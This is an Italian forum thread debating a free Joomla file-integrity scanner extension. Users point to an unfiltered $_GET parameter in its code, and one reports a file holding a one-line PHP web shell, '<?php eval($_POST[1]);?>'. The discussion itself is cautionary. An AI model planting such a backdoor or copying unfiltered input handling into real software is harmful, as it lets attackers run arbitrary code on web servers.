sono solo riflessioni...
Se provi a vedere quante risorse succhia questa operazione già ti vengono i primi dubbi.
if (isset($_GET['entry']))
$entry = $_GET['entry'];
ovvero tira dentro una var senza un minimo di controllo...logText(LOG_WITH_DATE,_text_('COM_EYESITE_SCANNER_ERROR_WRONG_ENTRY').' ('.$entry.')');
vabbè tu continui a fare lo spiritoso...si vede che ti viene meglio quello dell'informatica
non ho tempo per provare ma mi è bastato il punto 1... poi tu ridi...
Grazie per il test
:-\ ci sono problemi per scaricarlo ?
E' a pagamento ??
Sbaglio a fare clic su download ?
Grazie.
Carlo
Ci sarà stato un qualche problema nel loro server, il componente è gratuito.
Se continui avere problemi nello scaricare il file fammelo sapere che te lo inoltro io.
@adottauncane
ho provato il componente, ho fatto un test, come descritto nell'articolo, modificando, cancellando ed aggiungendo un file nella root e nelle sottocartelle ed il componente ha segnalato le modifiche.
Questo è quanto, non ho fatto altre prove né di dumb del database né di hackeraggio al componente stesso e nemmeno un sql injenction, ribadisco, ho fatto il test sopradescritto ed il componente ha funzionato, nulla di più e niente di meno.
Se puoi nandamelo, grazie
Carlo
Va benissimo, è quello che si fa quando si scrive un articolo, e naturalmente ti ringrazio.Buongiorno Adottauncane, il mio è un ex trovatello che ormai ha già una certa età, poveretto.
Solo resto con il dubbio (leggendo i post di MariaElenaBoschi io non ne capisco una cippa, tutto quello che faccio per la sicurezza è un backup e gli aggiornamenti) che magari il gioco non valga la candela...
È questo che mi interesserebbe capire.
Se qualcuno ha altre opinioni in merito...
/webconfig.txt.php conteneva:
<?php eval($_POST[1]);?>
Ho risposto ai tuoi post citando i testi di Battisti (è un caso, non è nemmeno uno dei miei artisti preferiti, anzi) perchè nella mia non più breve vita posso, con orgoglio, dire di avere imparato una sola cosa importante: non esistono cose giuste o sbagliate, esiste il modo giusto o sbagliato di dirle.
Dalle risposte a questo post, ma anche da altri interventi in questo forum, io percepisco che tu fai la gara a chi ce l'ha più lungo
e l'ho vinta ;)
e il Ministro ti ha anche detto perché si blocca...
ad ogni modo, sconsiglio caldamente di installare un'estensione come questa che introduce una vulnerabilità (il mancato filtro).
Meglio AdminTools.
un'estensione per la sicurezza che introduce vulnerabilità non è un astrazione è una cosa
Quella della vulnerabilità io non lo so, ho chiesto di verificare se esisteva quel file e se era scritto così. Se sì allora è una vulnerabilità se no allora può darsi abbia io in mano un file di una versione vecchia... cioè non è che mi sono sbattuto più di tanto ;)
e l'ho vinta ;)